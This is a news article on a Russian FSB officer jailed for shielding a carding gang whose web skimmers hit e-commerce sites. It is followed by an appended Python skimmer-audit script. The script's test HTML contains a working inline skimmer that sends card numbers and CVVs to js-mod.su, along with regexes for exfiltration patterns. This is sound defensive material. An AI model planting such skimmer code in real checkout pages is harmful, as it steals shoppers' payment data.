Russian FSB Counterintelligence Chief Gets 9 Years in Cybercrime Bribery Scheme – Krebs on Security


The head of counterintelligence for a division of the Russian Federal Security Service (FSB) was sentenced last week to nine years in a penal colony for accepting a USD $1.7 million bribe to ignore the activities of a prolific Russian cybercrime group that hacked thousands of e-commerce websites. The protection scheme was exposed in 2022 when Russian authorities arrested six members of the group, which sold millions of stolen payment cards at flashy online shops like Trump's Dumps.

A now-defunct carding shop that sold stolen credit cards and invoked 45's likeness and name.

As reported by The Record, a Russian court last week sentenced former FSB officer Grigory Tsaregorodtsev for taking a $1.7 million bribe from a cybercriminal group that was seeking a "roof," a well-placed, corrupt law enforcement official who could be counted on to both disregard their illegal hacking activities and run interference with authorities in the event of their arrest.

Tsaregorodtsev was head of the counterintelligence department for a division of the FSB based in Perm, Russia. In February 2022, Russian authorities arrested six men in the Perm region accused of selling stolen payment card data. They also seized multiple carding shops run by the gang, including Ferum Shop, Sky-Fraud, and Trump's Dumps, a popular fraud store that invoked the 45th president's likeness and promised to "make credit card fraud great again."

All of the domains seized in that raid were registered by an IT consulting company in Perm called Get-net LLC, which was owned in part by Artem Zaitsev, one of the six men arrested. Zaitsev reportedly was a well-known programmer whose company supplied services and leasing to the local FSB field office.

The message for Trump's Dumps users left behind by Russian authorities that seized the domain in 2022.

Russian news sites report that Internal Affairs officials with the FSB grew suspicious when Tsaregorodtsev became a little too interested in the case following the hacking group's arrests. The former FSB agent had reportedly assured the hackers he could have their case transferred and that they would soon be free.

But when that promised freedom didn't materialize, four of the defendants pulled the walls down on the scheme and brought down their own roof. The FSB arrested Tsaregorodtsev, and seized $154,000 in cash, 100 gold bars, real estate and expensive cars.

At Tsaregorodtsev's trial, his lawyers argued that their client wasn't guilty of bribery per se, but that he did admit to fraud because he was ultimately unable to fully perform the services for which he'd been hired.

The Russian news outlet Kommersant reports that all four of those who cooperated were released with probation or correctional labor. Zaitsev received a sentence of 3.5 years in prison, and defendant Alexander Kovalev received four years.

In 2017, KrebsOnSecurity profiled Trump's Dumps, and found the contact address listed on the site was tied to an email address used to register more than a dozen domains that were made to look like the legitimate Javascript calls many e-commerce sites routinely make to process transactions, such as "js-link[dot]su," "js-stat[dot]su," and "js-mod[dot]su."

Searching on those malicious domains revealed a 2016 report from RiskIQ, which shows the domains featured prominently in a series of hacking campaigns against e-commerce websites. According to RiskIQ, the attacks targeted online stores running outdated and unpatched versions of shopping cart software from Magento, Powerfront and OpenCart.

Those shopping cart flaws allowed the crooks to install "web skimmers," malicious Javascript used to steal credit card details and other information from payment forms on the checkout pages of vulnerable e-commerce sites. The stolen customer payment card details were then sold on sites like Trump's Dumps and Sky-Fraud.
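The skimmer-and-lookalike-domain pattern described in the two paragraphs above, as an added example that is not code from the Krebs article or the RiskIQ report: a small Python audit that collects every script a checkout page loads, flags any origin that is not on a store's allowlist (the hosts cdn.shop.example and js.stripe.com are hypothetical), flags the "js-<word>.<tld>" naming trick in general rather than only the three hosts the article names, and scans inline code for a form-submit hook paired with an exfiltration primitive. The checkout HTML is constructed for the demo. The last function emits the Content-Security-Policy script-src directive that makes the browser enforce the same allowlist, so a script injected through an unpatched cart would fail to load.

```python
"""Audit a checkout page for web skimmers: scripts loaded from unexpected
origins, and inline code that reads payment fields and beacons them out.

Added example; not code from the Krebs article or the RiskIQ report.
The checkout HTML is constructed, the allowlist hosts are hypothetical,
and the js-*.su hostnames are the ones the article names (with [dot]
restored). Nothing here contacts the network.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical approved script origins for the store under review.
ALLOWED_SCRIPT_HOSTS = {"cdn.shop.example", "js.stripe.com"}

# Lookalike hosts from the 2017 profile. The regex below generalises the
# naming trick so a js-<anything>.<tld> host is flagged even if unlisted.
KNOWN_SKIMMER_HOSTS = {"js-link.su", "js-stat.su", "js-mod.su"}
LOOKALIKE_JS_HOST = re.compile(r"^js-[a-z0-9]+\.[a-z]{2,}$", re.I)

# Skimmer tells in inline code: a form/field hook plus an exfil primitive.
HOOK_RE = re.compile(r"addEventListener\(\s*['\"](submit|input|change|keyup)['\"]", re.I)
EXFIL_RE = re.compile(r"new Image\(|\.src\s*=|fetch\(|XMLHttpRequest|sendBeacon\(|btoa\(", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed checkout page: two legitimate scripts, one injected external
# skimmer, and one injected inline skimmer that beacons card data out.
CHECKOUT_HTML = """<html><head>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://js-stat.su/stat.js"></script>
</head><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = btoa(document.querySelector('[name=cc_number]').value + '|' +
               document.querySelector('[name=cvv]').value);
  new Image().src = 'https://js-mod.su/img.gif?d=' + d;
});
</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script src values and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []          # start buffering an inline body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._buf = None


def classify_host(host):
    """Return a reason string if this host should not serve checkout JS, else None."""
    host = host.lower()
    if host in KNOWN_SKIMMER_HOSTS:
        return "known skimmer host"
    if host in ALLOWED_SCRIPT_HOSTS:
        return None
    if LOOKALIKE_JS_HOST.match(host):
        return "lookalike js-* host not on allowlist"
    return "host not on allowlist"


def audit_checkout_page(html):
    """Return (kind, detail, reason) findings for one page's scripts."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:            # relative URL: served by the store itself
            continue
        reason = classify_host(host)
        if reason:
            findings.append(("external", src, reason))
    for body in parser.inline:
        reasons = []
        if HOOK_RE.search(body) and EXFIL_RE.search(body):
            reasons.append("form hook combined with exfil primitive")
        for host in URL_RE.findall(body):
            reason = classify_host(host)
            if reason:
                reasons.append(f"contacts {host} ({reason})")
        if reasons:
            findings.append(("inline", body[:60] + "...", "; ".join(reasons)))
    return findings


def checkout_script_csp():
    """Hardened control: a script-src directive the browser enforces, so any
    script origin outside the allowlist (including a later injection) is refused."""
    hosts = " ".join(f"https://{h}" for h in sorted(ALLOWED_SCRIPT_HOSTS))
    return f"script-src 'self' {hosts}"


if __name__ == "__main__":
    for kind, detail, reason in audit_checkout_page(CHECKOUT_HTML):
        print(f"[{kind}] {detail}\n    -> {reason}")
    print("Content-Security-Policy:", checkout_script_csp())
```

Run against a saved copy of a checkout page (or a headless-browser DOM dump, since skimmers are often appended at runtime), not just the server response. The CSP in the last function deliberately omits 'unsafe-inline'; a store that still relies on its own inline scripts has to move them into files or add nonces before deploying it, which is exactly the work that removes the foothold skimmers use.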
